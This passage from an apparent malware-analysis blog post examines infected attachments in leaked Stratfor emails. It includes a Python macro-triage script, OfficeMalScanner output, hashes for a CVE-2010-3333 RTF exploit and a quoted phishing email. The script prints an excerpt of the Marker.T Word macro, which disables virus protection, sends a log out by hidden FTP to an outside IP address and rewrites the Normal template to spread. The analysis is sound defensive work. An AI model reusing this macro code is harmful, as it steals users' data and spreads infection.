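    "registry": re.compile(r"HKEY_(?:CURRENT_USER|LOCAL_MACHINE|CLASSES_ROOT|USERS)\\[^\"]+", re.I),
    "error_suppress": re.compile(r"\bOn\s+Error\s+Resume\s+Next\b", re.I),
}
# Anything that executes, persists or rewrites other code weighs more than plain noise.
WEIGHTS = {"shell_exec": 3, "self_replicate": 3, "code_inject": 2, "disable_av": 2}
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
WIN_PATH = re.compile(r"\b[A-Za-z]:\\[^\s\"']+")


def triage_vba(src):
    """Return matched behaviours, extracted IOCs and a crude score for one macro module."""
    hits = {}
    for name, rx in INDICATORS.items():
        found = [m.group(0) for m in rx.finditer(src)]
        if found:
            hits[name] = found
    iocs = {
        "ipv4": sorted(set(IPV4.findall(src))),
        "paths": sorted(set(WIN_PATH.findall(src))),
    }
    score = sum(WEIGHTS.get(name, 1) for name in hits)
    return {"hits": hits, "iocs": iocs, "score": score}


# Excerpt of the Marker.T macro quoted in the post (only the lines that matter for triage).
MARKER_EXCERPT = r'''
Private Sub Document_Close()
On Error Resume Next
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
Options.VirusProtection = False
    LogFile = "C:\hsf" & LogFile & ".sys"
    Open LogFile For Output As #1
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
End Sub
'''

# Constructed benign macro for contrast: no auto-exec name, no I/O, no shell.
BENIGN_MACRO = 'Sub Greet()\n    MsgBox "Hello"\nEnd Sub\n'

if __name__ == "__main__":
    for label, src in (("marker.t excerpt", MARKER_EXCERPT), ("benign", BENIGN_MACRO)):
        report = triage_vba(src)
        print(f"{label}: score {report['score']}, behaviours {sorted(report['hits'])}")
        print("  ipv4:", report["iocs"]["ipv4"], " paths:", report["iocs"]["paths"])
```

The extracted IPv4 address and file paths are exactly the values worth checking against proxy and endpoint logs when a document like this has been opened; the score is only a sorting aid for a pile of extracted modules, not a verdict.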

Using OfficeMalScanner provides further information:


[*] SCAN mode selected
[*] Opening file 117870_Hybrid write-up2.doc
[*] Filesize is 604672 (0x93a00) Bytes
[*] Ms Office OLE2 Compound Format document detected
[*] Scanning now...

             +++++ decryption loop detected at offset: 0x00019eb8 +++++


33C9                               xor ecx, ecx
E7EE                               out EEh, eax
2974E835                           sub [eax+ebp*8+35h], esi
79F7                               jns $-07h
34A2                               xor al, A2h
12F5                               adc dh, ch
72F7                               jb $-07h
94                                 xchg esp, eax
BA0EE6EEA9                         mov edx, A9EEE60Eh
7909                               jns $+0Bh
E615                               out 15h, al
774F                               jnbe $+51h
51                                 push ecx
B42F                               mov ah, 2Fh
EE                                 out dx, al
9E                                 sahf 
--------------------------------------------------------------------------


Brute-forcing for encrypted PE- and embedded OLE-files now...
Bruting XOR Key: 0x01
....

Analysis finished!

------------------------------------------------------------------------
117870_Hybrid write-up2.doc seems to be malicious! Malicious Index = 10
------------------------------------------------------------------------

There appears to be an additional payload in these files that is encrypted, in addition to the VBScript macro that sits on top. Uncovering it will take me a bit more time.

In addition to these three files I have also been working on a fourth file that makes use of a different set of exploits, 6566_TheSplitBetw.doc. Don't be fooled by the .DOC extension, this is an RTF file. 6566_TheSplitBetw.doc uses a classic RTF exploit: CVE-2010-3333.

md5 d93e2a5f8ac23824abc07f536aa4c50d
sha1 87584d1f761c3d8f34c4077da5aeadd4b1a470ca
sha256 e74fc919fba1cc8e9bc9680f026df8d4875c9f0f5864596445859ff916898b38

This exploit has been used in a number of attacks. In June 2011 a University of Louisville email server began sending out an email with an attachment claiming to be an "Insider's Guide to Military Benefits". The body of the email appeared to target Naval officers:

-----Original Message-----
From: CDR Courtney Bricks [mailto:cbricks@gmail.com] 
Sent: Tuesday, May 31, 2011 11:23 PM
To: xxxxxx
Subject: Defense News article of interest


Sir,
Defense News article by Chris Cavas, from your interview last week is pasted below.  Article appeared as a straight Q and A story, everything reads balanced and fair.  Please let me know if you have any questions or concerns.

V/r,
Courtney

The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.


Then again in May of 2011 the same exploit was used as an attachment to an email titled "Courier who led U.S. to Osama bin Laden's hideout identified" which was sent to a significant number of US government email addresses.

Both times the payload was different. The exploit is a Metasploit module. It's been patched by Microsoft since 2010.

I've been working on reverse engineering this code as well. This file does not contain VBScript macros. The most interesting tidbit I have found, apart from what is already well documented about this exploit, was recovered by scraping a bit of the shellcode using this Python script (JavaScript needs to be enabled to see the GitHub embed, or you can view it here instead; the extraction script was provided by Alexander Hanel, though Mr Hanel did not collaborate on this project):


This is what was recovered (another GitHub embed, which can be viewed here for those who don't trust someone else's JavaScript):



I am still in the process of investigating this; however, I am particularly interested in the creation of an executable, C:\a.exe, as well as a secondary RTF file, Tripolitania.RTF. Tripolitania, incidentally, was the name for the Libyan city of Tripoli in the early 20th century, when it was an Italian colony. These Stratfor guys do seem to have an interest in history (NOTE: Tripolitania.RTF appears to be the name of the first version of this document). I've recovered a little bit of the actual text of the attachment, and it looks like it was culled from a web page from Students for a Free Tibet:

"Lobby your government leaders to speak up for Tibet and protest Chinese leaders when they travel abroad. Take part in international days of action and commemorate historic dates within the Tibet movement."

At this point very few conclusions can be drawn from this information besides the obvious: those downloading this content from Wikileaks must use significant security measures to ensure the safety and reliability of their computing systems. Media organizations, including Wikileaks, are publishing email attachments like the ones I have identified here as infected with malware as part of their coverage of these document leaks. It is possible, for example, to search for and download emails and attachments from the Wikileaks site. It does not take a wild imagination to figure that those initially reviewing these documents could take significant security precautions, while such precautions become less vital through the editing process, until very few precautions are taken by the end user, who expects this content to be sanitized before a media organization provides it to them.

When downloading and viewing these files, most users are attempting to protect themselves from surveillance, from things like NSA's XKEYSCORE. Few users expect the leaked files themselves to be a threat. While there is overlap between the sort of security precautions that would protect a computer against outside surveillance and those that protect against infected files, there are significant differences. For example, air gapping can be an effective deterrent against both surveillance and some of the worst features of malware. However, the threat from surveillance is often considered transitory. After performing the task which needs to be protected from prying eyes, a user might not find it unreasonable to break their air gap and reconnect to the internet after deleting their secret files. Alternatively, a user might rely on a USB stick to transfer applications or files from the air-gapped computer to a network-connected computer. All such activity is easily exploited by malicious software. To use a somewhat related analogy - Tor won't protect you from a keylogger.

This is why notification of malicious software in these files is important: so users can adjust their operational security plans to account for it.

There are a number of theories that could account for the presence of this malicious software. Perhaps the least wild-eyed of those theories is that Stratfor employees were receiving these malicious files through email. Whether or not those employees did anything with those malicious files, they could have been retrieved by Lulzsec, who in turn provided them to Wikileaks. The data is indeed massive, over 5.5 million emails. Perhaps so massive that roughly two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (counting from the time they were received by WL, sometime around 2012).

That is not the only explanation. The Snowden revelations have spelled out in plain detail how the same organizations that have been very invested in the destruction of Wikileaks could very well be capable of putting malicious software onto a remote server, or of redirecting a file transfer so that malicious software is delivered in its place.

This post should not be construed as a warning to avoid paying close attention to media coverage of intelligence controversies because of the threat of malicious software. Quite the opposite, really. The information contained in these "Global Intelligence Files" is of critical social importance. People around the world should be able to inform themselves without putting themselves at undue risk.

The good news is this: the malware I have so far identified is old. So old that those using the latest versions of the software noted as vulnerable earlier are very likely safe even when executing these files. I scanned a number of these files using VirusTotal, and a significant number of anti-virus applications were able to detect an issue with the files. The flipside of this positive spin is that at best only half of the popular antivirus applications I used to test these files (I tested using roughly 70 antivirus programs) detected malicious software. Some files were detected by only 15 antivirus programs.

One last note: I will almost certainly be updating this post and writing additional information about what I find as I continue my research. This is very much a "work in progress". I welcome all additional information, particularly information that conflicts with or adds to what I have found so far.

NOTE: my second post on this topic is online, and contains further malware analysis.

Hector Monsegur, formerly sabu of Lulzsec, contacted me. Our discussion is available on my third post.
